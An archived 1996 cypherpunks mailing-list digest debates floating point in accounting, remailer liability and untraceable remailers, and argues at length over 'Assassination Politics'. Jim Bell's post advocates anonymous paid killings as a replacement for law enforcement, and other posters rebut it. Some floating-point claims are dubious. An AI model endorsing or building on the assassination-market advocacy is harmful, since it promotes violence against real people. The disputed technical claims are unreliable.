To: Matts Kallioniemi <matts@pi.se>
Subject: Re: The Crisis with Remailers
In-Reply-To: <2.2.32.19960521175237.0036cc44@mail.pi.se>
Message-ID: <199605221614.MAA23436@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Matts Kallioniemi writes:
> At 17:44 1996-05-21 +0200, bryce@digicash.com wrote:
> >Matts, you don't want to do floating point for money, because
> >floating point doesn't give you good control of precision.
> 
> Yes I do. Several major currency traders in Sweden keep all
> their money in 64 bit floating point storage.

I have trouble believing you. None of the forex accounting I know of
in the U.S. is done in floating point. It simply isn't accurate
enough.

It is true enough that *rates* can be stored as floats if you want,
but never actual sums.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Thu, 23 May 1996 06:05:04 +0800
To: cypherpunks@toad.com
Subject: Misquoting and Vlad (LD?)
Message-ID: <9605221620.AB09031@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


Here, I quote some text that is quoted frequently:

> >> such is the total moral perversion of the thinking behind 
> >> "assassination politics". most of the adherents work from the
> >> following argument, nicely summarized by JFA above: 
                                             ^^^^^
   

> >>1. the government is corrupt 
> >>2. therefore, it is okay to kill people who further that 
> >>    corruption. wow, what brilliant logic. 

I would appreciate if everybody would stop using that example.  No
threat or heinous tone here, but simply a reasonable request. I am
getting tired of it.  Of course, the collectivist who wrote that
sentence is totally wrong because I never said such things in the
context he meant them. But again, it is not everybody that followed
the thread and I am fed-up of seing thoses words attributed to me. 

I have no problem in building my bad reputation myself.  I don't like 
it when other do it...

So, please, if ever you quote it again, put at the beginning of the
paragraph: "Vlad Z. Nuri wrote:" or 
"Vlad Z. Nuri aka L. D(R)otweiller wrote:"

Thanks and Regards.

JFA

 DePompadour, Societe d'Importation Ltee; Limoges porcelain, silverware and crystal
 JFA Technologies, R&D consultants;  physists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 I reserve the right to post publicly any private e-mail sent to me.
 Unsollicited commercial e-mail will be proofread at US165 $/h
 Any sender of such material will be considered as to have ac-
 cepted the above mentionned terms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 23 May 1996 13:47:06 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: (Fwd) Re: TCM: mafia as a paradigm for cyberspace
In-Reply-To: <199605211950.MAA11604@mail.pacifier.com>
Message-ID: <199605221937.MAA28526@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


ok, I will reply to JB because it amuses me to tear his flimsy
wet-tissue-paper thinking.

>>the above sentence I find absolutely abhorrent: it justifies killing,
>>not merely because of the effect (the sort of "ends-justifies-the-means"
>>argument used by most here), but that in addition it is 
>>supposedly "ethical". ethical?!?!? 
>
>Then you've obviously dramatically mis-read my ideas.  I don't claim that 
>_EVERYBODY_ who will fall victim will "deserve" it by your or my opinions, 

oh, so in other words, a lot of "innocent" people will be murdered
under AP. ah, another great "feature", not a "bug", right??

>For example, if you believe in NIOFP, then anyone who violates it has 
>initiated force, and the victim of such force (or, perhaps, anyone else?) 
>can legitimately use a system like AP to fight back.

what is "legitimate"? in our government, "legitimate" refers to our
judicial system. it is what determines what is "legitimate" based
on laws. in your AP anarchy scheme, the word "legitimate" has no meaning.
"legitimate" is in the eye of the beholder. this ridiculous and
impractical definition was discarded centuries ago because of the
free-for-all bloody violence it inevitably leads to. be very
clear about what you are advocating: in AP, there are no laws. people
do not rely on the judicial system to solve their problems. they
take the "law" into their own hands and take out contracts on anyone
who offends them. would they feel justified in killing people who
disagree with them on cyberspace mailing lists? perhaps, who is to tell?

  If you _don't_ believe 
>in libertarian philsophy, obviously you won't necessarily agree with AP, but 
>the source of your agreement is that, not something inherently wrong with AP.

you don't have the slightest clue why I have lambasted AP despite my
very clear statements about why, because your brain has been twisted
in knots by something, perhaps watching too many old westerns.

>>the assassination politics is quite Hitleresque at its root.
>>"kill our enemies, and everything will be better. it is our enemies
>>that are the root of all evil in the world. extinguish them, and
>>you solve all problems automatically"
>
>THat's a false claim.  If the "enemies" are enemies because of what they've 
>actually done wrong, say violate your rights, then it should be your right to stop 
>them.  The method you choose shouldn't matter.

ah, like murder. I see.  well, I think you are violating my rights by
disagreeing with me. I shall arrange your consequences accordingly.

>You seem to be assuming that if there are TWO "wrongs" here.  But I've tried 
>to make it abundantly clear that justification for the self-defense comes 
>from the initial "wrong."

but who decides what is wrong? the arbitrary opinion of some single
human idiot out anywhere in the world? don't you see the tyranny
of this? it is far worse than the tyranny of a government if I were
to be killed by someone who believes that I violated his rights
by breathing air particles or whatever. via AP, you wish to give him
the mechanism to murder me without trace. 

>  Where, then, is the SECOND "wrong"?  What, 
>exactly, makes it wrong?  If a person can't get justice any other way (not 
>to be confused with merely a chance at justice) then why deny that person 
>his rights?

deny rights, legitimacy, justice, blah, blah, blah. the terms you use have no 
meaning in the system you are advocating. there are no "rights" in an anarchy,
because a government is the entity created to safeguard/protect them.
all actions are legitimate in an anarchy, because there is no civilized
system that rejects any ones in particular.

>I acknowledge that if there is no initial "wrong" (the target didn't 
>actually do anything wrong) then the act of targeting him is, itself, wrong, 
>but you're apparently unwilling to back up this hypothetical. 

what? that is exactly the hypothetical I have been focusing on. what
you fail to comprehend in your reptile-size brain is that "wrong" is
a matter of subjectivity. violation of a right is also a subjective
matter. after many centuries of experimentation mankind settled on
something called a "court system" to make civilized decisions that
transcend the irrationality of single men. if you think that a 
government is a tyranny, perhaps you are not aware of the tyranny
of the irrationality of individual men. ah, but if you thought about
it some more you might come up with some examples in your close
proximity.

>It should be obvious to anyone around here that if AP "works," it will work 
>regardless of whether it meets with your approval or any other subset of 
>humankind.  That makes it worthy of discussion even if you don't like it.

it will "work" exactly as anonymous murdering now works. AP already exists, 
that's what you don't understand.  what you seem to claim is that
by opening it up to the masses, you'd have an egaltarian murder effect
that would cleanse society. just curious, how were you raised? what
kind of childhood did you have that would cause you to think like
you do? I really pity you.

>Your objections are invalid.  The mere fact that SOME organized killing 
>systems occurred in the past has essentially no relationship to the system I 
>describe.

assassination politics already exists and have existed for centuries.
there is nothing fundamentally new about your ideas.

  The prospect of perfect anonymity, allowing the system to be open 
>to anyone who chooses to contribute, will make it vastly different from 
>anything that came before.

ah yes, exactly what we need. "enhanced anarchy". you and TCM really
should get together and collaborate. I'm sure you'd come up with
some fruitful conclusions.

==

let me give everyone an example of Jim Bell AP thinking. I will do
this some more if he persists.

A brilliant scientist named Jim Bell studied the problem for many
years and in an epiphany one day realized that 99% of murders were due to 
weapons held with people's hands. he proposed that everyone's hands
be cut off. murders would instantly drop 99%.

congress decided that rich people needed to be taxed more. so they
put a luxury tax on yachts and nice cars. they computed exactly how
much they would make based on this tax, and patted themselves on
the back. unfortunately, the effect was to cause the rich to stop
buying these products. the industries were devastated.

Jim Bell, a masterful sociologist,  proposed setting up a system 
whereby people could arrange anonymous "hits" on others who annoyed
them as a solution to all society's problems. of course it wasn't
that simple, but that's what it amounted to. the system was quite 
popular at first. it created an air of deadly fear in which everyone
was afraid to do anything, even go out of their houses to shop
for groceries. eventually, someone snuffed out Jim Bell, and everyone
went back to living normal lives. yes, the system worked exactly
as it was supposed to.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Rosoff <drosoff@arc.unm.edu>
Date: Thu, 23 May 1996 09:07:56 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: An alternative to remailer shutdowns (fwd)
Message-ID: <1.5.4.16.19960522184009.4f4f8220@arc.unm.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 10:24 AM 5/21/96 -0800, jim bell <jimbell@pacifier.com> wrote:
>At 06:28 PM 5/20/96 -0500, Jim Choate wrote:
>>
>>Forwarded message:
>>
>>> Date: Mon, 20 May 1996 15:02:08 -0700
>>> From: Hal <hfinney@shell.portal.com>
>>> Subject: An alternative to remailer shutdowns
>>
>>> was apparently sent through my remailer.  According to 18 USC 875(c),
>>> "Whoever transmits in interstate commerce any communication containing
>>> any threat to kidnap any person or any threat to injure the person of
>>> another, shall be fined not more than $1,000 or imprisoned not more
>>> than five years, or both."  I may not be able to continue operating
>>> either of my remailers (alumni.caltech.edu and shell.portal.com) for
>>> much longer due to this kind of abuse.
>>
>>There should be a section in there dealing with 'knowingly'. If not then we
>>should immediately bring charges against any and all newspapers who have
>>ever printer a ransom letter, or perhaps even the Unibomber Manifesto since
>>there is clear evidence of 'threat to injure the person of another'.
>
>But even "knowingly" needs to be carefully defined.  A remailer operator 
>today KNOWS that his system COULD be used for illegal activities; he merely 
>doesn't know that they are, currently.  I think that the definition should 
>be so narrow that it is impossible for a third party (or the government 
>itself)  to incriminate the remailer operator by having his system forward 
>arguably illegal or copyright-violating material.
>
>
>Jim Bell
>jimbell@pacifier.com

Can the same sort of standards as per the U.S. CDA be applied? The first
draft of the
CDA would have held ISP's responsible for, e.g., porn transmitted using their 
services. Isn't this the same sort of thing - that is, that remailer
operators provide
a service, and they cannot be held responsible for people who abuse that
service? I
think that this line of thought is reasonable.

David

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMaNZlxguzHDTdpL5AQGkIgQAkfTaXyFp32yX1CiKK/7xlfvojYK+oG2U
BWS5w2gMWeorRB1jPJW3Aec3cAlUQCoYg7TOd+Z8EgHWqHxR30cDUBd56oq1wlmf
0X3d2rjnM64Bcq8gonFXPxeSU+C3O0qobdj58BUpo+o2ueNo0sPGLK79KKAHuhWW
oBBXV6jGTWc=
=AXOt
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Thu, 23 May 1996 15:02:09 +0800
To: cypherpunks@toad.com
Subject: Re: Floating Point and Financial Software
In-Reply-To: <199605221618.JAA04180@netcom7.netcom.com>
Message-ID: <Pine.3.89.9605221209.A6231-0100000@netcom4>
MIME-Version: 1.0
Content-Type: text/plain



While I wont argue the veracity of floating point use in financials, I 
will make a point or two for your consideration.

The basic issue in the micro world has been imprecision - primarily due 
to word size (8 and 16 bit). Frankly I view it more as a pain tolerance 
to estimation. 

Now that 32 and 64 processors are handy (yes the 80 bit x87 has been 
around for a while), it becomes more of an issue of hair splitting. 

I never incorporate floating point into any of the financial software I 
have written over the years, primarily just on a matter of principle. 
Secondly, since most of it was written to the Intel platform (read 
washing machine controller), there is a very distinct advantage in doing 
integer only from purely a performance basis.

As to acuracy. Normally it doesn't matter when the rounding error sits 
some 18 to 23 decimal places out, when you are calculating dollars and 
cents, but many of the calculations I have been forced to endure center 
around such mathematical abuses as compound interest. Here, it is not 
only probably, but expected to work thousands of recalculations in a 
series, with each building upon the last. Rounding error grows very 
quickly in these types of circumstances. However, just to be fair, there 
is a plethora of business math done in software that limits itself from 
one to several recalcs, and the accuracy only needs to be to the penny or 
at worst 4 to 6 decimal places out.

Even Intel can handle this.... :-)

>From alt.humor.pentium:

DId you hear that Intel has found a home for all those pentiums with the 
floating point error ? They sold them to Mattel.

Now when you pull Barbie's string, she says "Math is hard..."

...Paul (politically incorrect and loving it..)

On Wed, 22 May 1996, Mike Duvos wrote:

> There seem to be a few mini-flames on the list over whether
> floating point data representations are appropriate for financial
> software.
> 
> In a nutshell, the answer is "YES", and the use of floating point
> arithmetic is common in such applications.
> 
> One argument heard against the use of floating point is that it
> is inherently "imprecise." In reality, floating point
> representations and the results of floating point operations are
> perfectly well defined, and the points on the real number line
> which are exactly representable by double-precision floating
> point values are usually a superset of those representable by the
> default integer on most machines.
> 
> Storing monetary values as double-precision floats having integer
> values in cents is even common in COBOL programs, where the
> "COMP-3" data type allows the use of fast floating point in lieu
> of the default and slow manipulation of packed decimal and
> decimal data.
> 
> It is even common in certain CPUs, like CDC Mainframes and
> SPARCS, which are primarily floating point engines, to omit
> integer divide and sometimes even multiply, and to provide a
> subroutine which employs floating point calculations to emulate
> these operations. This is completely transparent to the user of
> the machine, and there is no problem in using floating point to
> do integer operations.
> 
> In fact, when running financial applications on large engineering
> mainframes, which generally lack a business instruction set,
> floating point is not only commonly employed, it is the obvious
> way to get the maximum performance out of the machine.
> 
> --
>      Mike Duvos         $    PGP 2.6 Public Key available     $
>      mpd@netcom.com     $    via Finger.                      $
> 
> 

-------------------------------------------------------------------------

"Faced with the choice between changing one's mind and proving that there
 is no need to do so, almost everybody gets busy on the proof"

                                            -- John Kenneth Galbraith

"Success is attending a funeral as a spectator"

                                            -- E. BonAnno 

-------------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 23 May 1996 12:25:18 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: (Fwd) Re: TCM: mafia as a paradigm for cyberspace
In-Reply-To: <01I4ZKIOEV7G8Y5IL9@mbcl.rutgers.edu>
Message-ID: <199605221952.MAA29965@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



I will quote an anonymous AP proponent with the initials EAS

>>the above sentence I find absolutely abhorrent: it justifies killing,
>>not merely because of the effect (the sort of "ends-justifies-the-means"
>>argument used by most here), but that in addition it is 
>>supposedly "ethical". ethical?!?!? for g*d's sakes, promote your
>>depraved scheme under any other heading, but do not claim it is
>>"ethical" unless you want to further demonstrate how far from
>>morality you have twisted your brain.
>
>	In other words, if I'm shooting at you, it's unethical for you to
>shoot back?

get a clue. I didn't argue against someone shooting at you. I argued
against the claim that you should be allowed to shoot anyone in
the government because you think the government is corrupt.

 While I'm not sure whether I approve of Assasination Politics or
>not (I'm not sure whether it'd lead to more or less violations of rights than
>other possible means of changing the current setup),

as I wrote, there is no such thing as a "right" in a society in which
people decide who they would like to kill based on their own whims.
there are no rights in a socieity in which killing is considered an everyday
part of life, period. note I do agree this applies to some forms of 
government. 

 I do achnowledge the
>rightness of self-defense against governmental evildoing.

ah, now there's where the silly non-sequitur of AP proponents comes
in. "the government is corrupt, therefore we should be able to shoot
any government employees we choose". the government is not sticking
a gun down your throat this minute, are they? well, why are you
seriously contemplating the converse? oh, you say that FIGURATIVELY
the government is doing this to you? and you want to respond
LITERALLY? I wonder who is the tyrant in this situation?

"the government might shoot me if I don't pay my taxes". uhm, can
you point out who this actually happened to you? what? you have
an example? out of the 250 million people in this country, you
actually found one? and you are concerned this will happen to you?
well if you keep making a lot of noise, maybe you can achieve
what appears to be your wildest fantasy!!

AP proponents piss on the english language in their quest for
"justice". the ways that AP proponents are twisting language, 
AP trash is almost worse than much classic government
propaganda that has started past wars. "we have rights. we
want justice. our rights are being violated. we are acting
in self defense."  TRASH, TRASH, TRASH

 To use your
>example of Hitler, somehow I think an assasination of him would have been
>ethical.

I used him as an example of the kind of thinking that "murdering your
enemies solves all your problems". yes, that was his point of view, and
you inform me that you share it? well, congratualations!! hitler
doesn't have too many friends and can use all the sympathy he can get.

murdering Hitler would not have
solved all the problems of WWII. the problem was militarism that
was embodied by many cultures outside of his own, e.g. Japan and
Russia.

AP proponents believe that:

1. the world is full of people that are part of the problem or part
of the solution

2. I can tell precisely the difference

3. I'd like to kill those that are part of the problem.

4. if AP existed, and it appeared there was a way to kill other people
without trace, I would go through with it.

5. I have a lot of teachers I hated in my childhood too. I think I
will go for them next. possibly not before seeing if they beg for mercy.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 23 May 1996 06:51:03 +0800
To: mpd@netcom.com (Mike Duvos)
Subject: Re: Floating Point and Financial Software
In-Reply-To: <199605221618.JAA04180@netcom7.netcom.com>
Message-ID: <199605221706.NAA23567@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Mike Duvos writes:
> There seem to be a few mini-flames on the list over whether
> floating point data representations are appropriate for financial
> software.
> 
> In a nutshell, the answer is "YES", and the use of floating point
> arithmetic is common in such applications.

Again, I have seen floating point used for things like rates and in
simulations. I have never seen it used for accounting. If you can
name a system in which accounts were kept in floats I'd like to hear
about it -- personally I'd be surprised. I've never seen such a thing.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Thu, 23 May 1996 10:34:04 +0800
To: cypherpunks@toad.com
Subject: Re: The Twilight of the Remailers?
In-Reply-To: <9605221917.AA00675@nwk2_ocalsl>
Message-ID: <199605222008.NAA02211@netcom16.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com> writes:

 Mike Duvos writes:
 >>  Contrast this with a DC-Net of boxes which can covertly inject
 >>  packets into the Net, in some untracable manner.  Now we have
 >>  no identifiable "Hal" to be harrassed, and no one for the
 >>  Clams to aim their lawyers at.

 > While this is a nice thought, it is incorrect.  You can't
 > "covertly inject packets into the Net, in some untraceable
 > manner."

You can temporarily modify router tables, spoof IPs and idents,
and leave few traces behind once the data has been transferred,
particularly if the origin is some obscure foreign location.

 > The output of the DC net is simply a block of
 > random-looking bits for each member of the net.  Someone
 > must XOR each of the blocks together before the message is
 > readable.

Correct.  But I was mentioning DC-Nets only in the context of a
mechanism for permitting the dispersed parts of such a system to
communicate with each other, without identification of a
particular node as being responsible for a particular action.

 > If the addressee is not personally watching the DC-net and
 > assembling all the blocks looking for a message, someone
 > else must do that and put it out on the Internet (via
 > e-mail, usenet, IRC, etc...).  That someone is the person
 > who is going to take the heat for the massage.  It is
 > exactly the same situation as with current remailers:
 > someone gets mail they don't like, they trace it back as far
 > as possible (i.e., to the remailer operator).  The last
 > person holding the 'hot-potato' gets burned.

The idea here was to have a large number of nodes, each capable
of injecting data into the Net in a manner which cannot be easily
traced back to an individual.  These nodes would talk to each
other using a mechanism which obscured both eavesdropping and
traffic analysis of their communications, a DC-Net being one
possible way of doing this.

 > Since it looks like the "everyone's a remailer" dream is
 > not becoming a reality, the key to successful remailers is
 > to make the *operators* untraceable as well.  If you can't
 > trace the operator, you can't hold them liable.  We have
 > discussed techniques for doing this before: cash paid
 > accounts, using dialups (possibly from a public phone).
 > The remailer must be a 'sacrificial cow' that can be
 > snatched up by 'authorities' at any time.

You could get the same effect with an instant anonymous account
that could be purchased with Ecash.  You would buy it on the
spot, send your mail, and forget about it.  For all practical
purposes, it would serve the same function as a remailer, and
steps could be taken to obscure the identity of whoever had
telnetted to it.

Another possible approach is the "remailing packets" one.  You
could set up a packet remailer which could be used as a universal
proxy server in some untouchable foreign location.  If we had a
"packet remailer in a box", these things could pop up all over
the place, live a short time, and be nuked.  Since the
communication would be real-time, concerns over reliability and
delivery would not exist in the same way they do for the current
system of remailers.

 > Because it takes considerable time, effort, and money to
 > setup and run a remailer that is untraceable to the
 > operator, there must be compensation. The solution is a
 > typical cypherpunk one: Digital cash postage that is
 > collected by the remailer, encrypted with a public key, and
 > posted to alt.anonymous.messages.  Our untraceable remailer
 > operator sits back and collects the cash until the remailer
 > is forcibly shut-down.  Then he starts up a new one
 > (assuming this is profitable).

I don't think most people are going to pay to remail.  Or, to put
it another way, the types of traffic people will pay to remail
are those no remailer operator will want to touch with a barge
pole.

 > The age of remailers with publically known operators is
 > drawing to a close. Basically the only missing link is the
 > digital postage.  If we get that, then being an anonymous
 > remailer operator could be the first cryptoanarchist job
 > that basically anyone can get and where you can collect
 > money completely untraceably and tax-free.  To me that seems
 > like a big step towards the future that many of us have been
 > discussing for the past few years.  A very exciting
 > prospect.

Perhaps.  Time will tell.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Thu, 23 May 1996 10:37:12 +0800
To: snow <snow@smoke.suba.com>
Subject: the system CAN work
In-Reply-To: <Pine.LNX.3.93.960521154610.587B-100000@smoke.suba.com>
Message-ID: <199605222009.NAA01919@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>	I might be wrong here, but I don't think that Mr. Bell actually
>wants anyone actually shot, well, maybe he does, but what he wants is to
>have the same power over members of governments than they have over him.

the way to exercise power of the government is to organize and
wield that power. JB and others are people who have never tried
this process and in fact are dysfunctional human specimens whose
sheer irritability cause them to be incapable of successfully
interacting in a society. so, like Ted Kaczinsky, they come
up with their own novel solution.

JB reminds me of people who start to play a game, but then find
that they are losing by the rules of the game, and then throw
up the game and hit their opponent.

the rules of the game of our government are mostly fair. there
are legitimate ways to revolutionize the system, working from
the inside. those working on overthrowing it have no qualifications.
have they personally tried to organize? of course they claim
it is fruitless. but I think it is only fruitless because everyone
claims it is. if everyone acted as if it wasn't fruitless, it wouldn't
be.

the recent actions in congress regarding clipper are STRONG EVIDENCE
that our political system will respond to our demands, and more
so the more pressure we put on it. it would have been unthinkable
even say 6 months ago to imagine senators publicly opposing
Clipper. we not only have Burns outright opposing Clipper and the
Clinton administrations' stand, we also have Dole up there as
well. they have made it a MAJOR ISSUE. we have very 
strong pro-crypto bills in the works. the whole
idea of the senators even taking an INTEREST in this case was
unthinkable only a short time ago. yet the system has changed
DRAMATICALLY.

you expect the tax code to be abolished TOMORROW?? sorry, it
won't happen. but the amazing resonance of the flat tax with
Forbes this year, which again would have been unthinkable only
a few years ago, shows that strong currents are coming to bear
on the system.

do you hear any cpunks rejoicing about these new dramatic
victories and motions? no, because they are mostly a bunch of
whining nihilists, anarchists, and cynics. no matter what happens,
they will tell you that the sky is falling and Big Brother is
still hiding in your closet, that the world is hopeless so we
might as well just go out and shoot our enemies. 
they want instant gratification.
they don't want to work to have a better system, they would
much rather kill a few people in government this weekend and get the 
satisfaction from it. "ah, a job well done" they would conclude.
perhaps so, by their standards.

why am I so incensed at all the APers? because they don't realize
they will devastate our society far more than it is already 
devastated. we don't have a great system now, but what they are
proposing is an apocalypse of sanity. our system can be pressured
to change. are we acknowledging how pathetic our skills are in
manipulating politicians? how can it be that a government that
is so corrupt can have such power over you? are you saying that
you are powerless against it? 

it takes two to tango. a corrupt government is the perfect match
for a corrupt populace.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 23 May 1996 11:47:51 +0800
To: snow <cypherpunks@toad.com
Subject: Re: TCM: mafia as a paradigm for cyberspace
Message-ID: <199605222032.NAA04351@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:02 AM 5/22/96 -0500, snow wrote:
>On Wed, 22 May 1996, jim bell wrote:

>> more,  you'd better not be a crook!
>
>	Or turn in too powerful a crook.

Since ratting on people can always be anonymous (and especially so after the 
advent of good encryption and remailers, assuming they survive!) I don't 
think it'll be a problem to turn in somebody "too powerful."   In fact, the 
AP system will probably spur the simultaneous development of a system to 
anonymously reward people who identify and locate bad people of all kinds, 
even if all they do is this.  But unlike the current form of rewards, the 
snitch won't have to reveal himself to anybody.

> Law enforcement won't just go away. 

That's true, but with a caveat:  Post-AP, there will be no such thing as 
"laws" per se.  What there will be is an amorphous world of various 
interests, of people who feel stepped on if you abuse them, etc.  
Cumulatively, those interests will constitute "laws," but not like a list of 
hard-and-fast rules.


>There will always be those of us who feel that most crimes _don't_
>deserve the Death Penalty, and that some sort of penal system will
>continue to be necessary. In your system this would not be possible
>because most people would be afraid to turn people in for fear of
>reprisal. 

Unfortunately, I still haven't written up a description of a replacement for 
the current "criminal justice system" that I anticipated, and another person 
on a different list independently though of and described in much greater 
detail:  A set of independant, privatized court systems which an agrieved 
victim can go to (perhaps anonymously) to charge the "defendant."  The 
defendant, however, doesn't have to show up because it's a voluntary system. 
 The punishment will probably be usually a monetary penalty, which if not 
paid is numerically added to the reward fund against that person.  A 
defendant is motivated to defend himself to prevent such an eventuality.  
The accuser is, likewise, motivated to use this system because if the 
defendant is exposed as an unchallenged criminal, potential assassins (and 
AP organizations) will presumably work cheaper for their deaths if the 
defendant doesn't pay the fine.

>	I think that the biggest flaw in your system is the belief that
>people will act rationally. Do you think that the Menendez(sp?) brothers
>would have hesitated one second in having there parents offed to collect
>the inheretance? 

Did the Menendez family have relatives who might have wanted retribution for 
the killings?  If so, they could have gotten their revenge very cheaply.  
How about other rich people who didn't want their to be a precedent that two 
sons could kill their rich parents and get away with it?


>> >Note: I don't necessarily think that AP is a good idea. I think
>> >that people should do their own dirty work.
>> 
>> In practice, I think this would be comparatively common as well.  What 
>> currently deters such "take the law into your own hands" is the fact that 
>> police (being, essentially, in the business of protection) don't want you 
to 
>> provide for yourself by protecting yourself.  They make it hard on people, 
>> in the same way they did with Bernard Goetz, the guy who shot four muggers 
>> on the New York city subway system.  Once AP gets rid of the police, it 
will 
>> be much easier to protect yourself and not risk jail time, etc.
>
>	Umm... I think that the biggest reason that the Police don't want
>you taking the law into your own hands is that civilians tend to screw up
>badly. They get the wrong target, they don't stop when they should etc. 

While I can't quote a specific study, I seem to recall a statistic that 
civilians were actually MORE likely to shoot and/or kill the RIGHT person, 
as opposed to the wrong person Remember, most police show up substantially 
after an incident starts, and they don't know who's in the wrong.  A person 
who's in the right KNOWS this already; he's seen the incident from the 
beginning.

Also, you said civilians "don't stop when they should."  Who decides when 
they should stop?  Well, more likely than not it's the police, who would 
prefer to NOT obsolete themselves, and a dead criminal is far less valuable 
to the police, prosecutors, and jailers than a live one.  I'd say that's a 
conflict of interest, wouldn't you?  (a live criminal results in profits to 
all these groups, plus lawyers, etc.)

>	The POLICE usually don't have a problem with an individual
>protecting themselves (as long as the response fits the crime, killing a
>shoplifter is a no no.) It is the court system that frowns on it.

It doesn't really matter which group is making it difficult on the 
civilians, if they are doing it,  it makes it harder for the civilians to 
protect themselves.


>	Is there the ability to predict a "mild beating" with your system?
>or a "severe beating", or simply a killing? Having one level of punishment
>is not a very good legal system. AP cannot replace it. 

It can with the competing, privatized system with punishments based on fines 
that I described above.

>> Superficially, a person might argue that the lack of police would also make 
>> it easier for the muggers.  However, a "professional mugger" would make a 
>> LOT of enemies, and it wouldn't take long before he's dead.  He'd only have 
>> to be caught once.  Any victim of any mugger would be happy to donate to 
see 
>> him gone.
>
>	Give me the name of a mugger. 

Offer to pay money for such information in most inner cities, and you'll get 
plenty of takers if the reward's high enough. (and can be collected 
anonymously.)  Remember, AP works because certain people with access to 
information are given the financial motivation to either kill the criminal 
or simply reveal (possibly anonymously) who he is.  The current system uses 
money rewards only sparsely, and does not publicize them very well.


>> Right.  Moreover,  I believe that governments simply cannot exist as we 
know 
>> them under these circumstances.  Besides, they won't be necessary.
>
>	See, you have far more faith in humanity than I do. 

I have plenty of faith that once the centralized, heirarchical political 
structure is demonished, things will be better.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 23 May 1996 07:18:03 +0800
To: bryce@digicash.com
Subject: Re: The Crisis with Remailers
In-Reply-To: <199605221708.TAA00752@digicash.com>
Message-ID: <199605221731.NAA23607@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



bryce@digicash.com writes:
> > It is true enough that *rates* can be stored as floats if you want,
> > but never actual sums.
> 
> That's interesting.  Because rates never approach 2^23, and 
> because you never need that much precision with rates?  It seems
> like a bad idea to me anyway.  Why not just use an Int32 if you 
> don't need that much precision?

I only report the news. I have occassionally seen floats in rates, I
have never seen them used in accounting.

I will also note that rates do indeed get astonishingly precise --
five significant figures.

In any case, however, I have never seen accounts done as floats --
never.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AFDA2@aol.com
Date: Thu, 23 May 1996 08:01:46 +0800
To: MILITIA@tomlinson.com
Subject: Criminal Law Web Site
Message-ID: <960522133157_496416046@emout09.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


The upgraded Web site for the Association of Federal Defense Attorneys (AFDA)
is now available at http://www.afda.org

The site provides several valuable tools for criminal defense attorneys who
practice in the federal courts:  (1) a convenient compilation of over 100 Web
sites pertaining to federal law, including search capabilities through all
the statutes and case law rulings; (2) an online newsletter that is updated
weekly; (3) a message board; (4) a form library for downloading documents (we
will soon begin uploading documents to the library); (4) a listing of
upcoming seminars for which you can register online; (6) a feedback form so
that you can give us your comments and suggestions; (7) and a survey function
so that we can conduct polls within the criminal defense bar online for
submission to Congress.

The Web site is financed through membership dues on a non-profit basis.
 Until mid-June, the site will be free to all users but will then become
password-protected for members only.  We hope you will take advantage of this
important resource and join the Association so that we can continue providing
the defense bar with needed support.  To join, simply click the "Join AFDA"
bar on the main page of the Web site.

Best regards to all.

Greg Nicolaysen
(Los Angeles)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Thu, 23 May 1996 11:01:24 +0800
To: cypherpunks@toad.com
Subject: Re: The Crisis with Remailers
In-Reply-To: <199605221904.PAA23720@jekyll.piermont.com>
Message-ID: <199605222051.NAA20284@netcom21.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry Writes:

> Floating point systems are built to do approximate math on a very wide
> range of number sizes. Accounting systems require exact math -- down
> to the cent. Floats aren't suitable.

Calling floating point math "approximate" is a bit of a misnomer.  
Floating point numbers all correspond to exact points on the real 
number line.  The floating point number taken as the result of an 
operation, if that result is not another floating point number, is 
always chosen consistantly in a way which has minimum error and zero
bias. 

Floating point numbers can be used to do exact integer arithmetic
quite easily.  A 48 bit mantissa can represent 14 decimal digit signed
integers with no loss of precision, and $999,999,999,999.99 is more
than enough magnitude for most bean counters. 

--
